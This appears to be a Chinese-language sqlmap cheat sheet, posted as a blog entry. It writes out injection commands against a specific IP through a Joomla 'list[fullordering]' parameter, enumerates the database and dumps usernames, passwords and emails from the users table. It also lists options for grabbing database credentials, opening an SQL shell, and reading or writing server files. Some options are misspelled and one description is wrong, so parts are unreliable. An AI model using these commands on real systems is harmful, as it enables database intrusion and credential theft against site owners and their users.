sqlmap注入命令大全

sqlmap -u "注入点地址"  --dbs扫描数据库


 "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="  -D joomla  --tables  打开数据库中的 ”joomla表格


sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="  -D joomla  -T '#__users' --columns    打开#——users 列


sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="  -D joomla  -T '#__users' -C username,password,email --dump
  指定列中选项查看


--users  获取数据库所有用户(数据库登陆账户)
--passwprds 获取数据库用户密码(数据库登录密码)
--current-user 当前网站数据库的用户名称


任何命令后跟batch(一切选项选择默认)

进阶:
探测等级  --level 5   (一共有五个等级,默认等级是1,等级五最高,但是也最慢)
level5能自动破解出cookie,xff等头部注入。

--is-dba  探测账户是否有超级管理员权限  (true是,false否)
--roles:列出数据库管理员的角色
--refere:HTTP Referer头  如:referer http://baidu.com(此指令可以对referer头注入,可以使用referer命令欺骗,但要求level在3以上)

--sql-shell【(此指令使用后可以直接使用mysql语言查询)很强!】
--file-read:从数据库服务器中读取文件   例如:sqlmap.py -u “xxxxxxxx”--file-read  “C:/”【读取c盘中的全部文件】
--file-write “上传文件路径” --file-dest “目标文件系统绝对路径”

mysql5.0版本之后,mysql默认在数据库中存放一个‘information schema‘的数据库我们需要记住三个表名分别是schemata,tables,columns。
schemata表储存了该用户创建的所有数据库i库名和需要记住该表中记录数据库的字段名为schema name
tables表储存了该用户创建的所有数据库表名,记录数据库表名的字段名为:tables schema和table name
coulmns表储存了用户创建数据库的库名,表名,字段名,要记住该表中记录数据库,库名,表名,字段名为:talbe schema,table name,columns name

你可能感兴趣的:(web安全,网络安全)